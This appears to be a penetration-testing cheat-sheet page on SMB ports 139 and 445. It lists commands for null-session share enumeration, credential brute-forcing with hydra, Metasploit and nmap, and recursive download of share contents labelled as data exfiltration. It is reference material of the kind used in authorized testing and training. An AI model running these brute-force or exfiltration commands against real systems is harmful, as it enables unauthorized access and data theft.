LinkedInGithub
Edit

SMB 139,445

SMB Enumeration and Scanning

Null Session Access

A null session allows unauthorized users to access network resources without credentials, if not disabled.

Tools:

  • smbclient: Command-line tool to interact with SMB shares.

  • smbmap: Python tool for SMB enumeration.

  • NetExec: A tool for testing null session access on multiple hosts.

Commands:

  • List shares:

    • smbclient --list //$IP

    • smbmap -H $IP

    • smbclient --no-pass --list //$IP (no password)

    • smbclient --user ''%'' --list //$IP (explicit null creds)

  • Open an interactive session:

    • smbclient //$IP/$SHARE_NAME

  • NetExec:

    • netexec smb $TARGETS -u '' -p '' --shares

Bruteforce SMB Authentication

Tools like hydra, Metasploit, and nmap can be used to brute-force SMB credentials.

Tools:

  • hydra: Tool for brute-force attacks.

  • Metasploit: Includes auxiliary scanner modules.

  • nmap: SMB brute-force script.

Commands:

  • Hydra example:

    • hydra -L usernames.txt -P passwords.txt $IP -V -f smb

  • Metasploit example:

    • msf5 > use auxiliary/scanner/smb/smb_login

  • Nmap example:

    • nmap --script smb-brute -p 445 $IP

Data Exfiltration

Using SMB tools to download/share data from accessible SMB shares.

Tools/Commands:

  • smbclient:

    • recurse ON

    • prompt OFF

    • mget * (recursive file download)

  • NetExec:

    • netexec smb $TARGETS -u $USERNAME -p $PASSWORD -M spider_plus -o READ_ONLY=False

PreviousRDP 3389NextSMTP 25,465,587

Last updated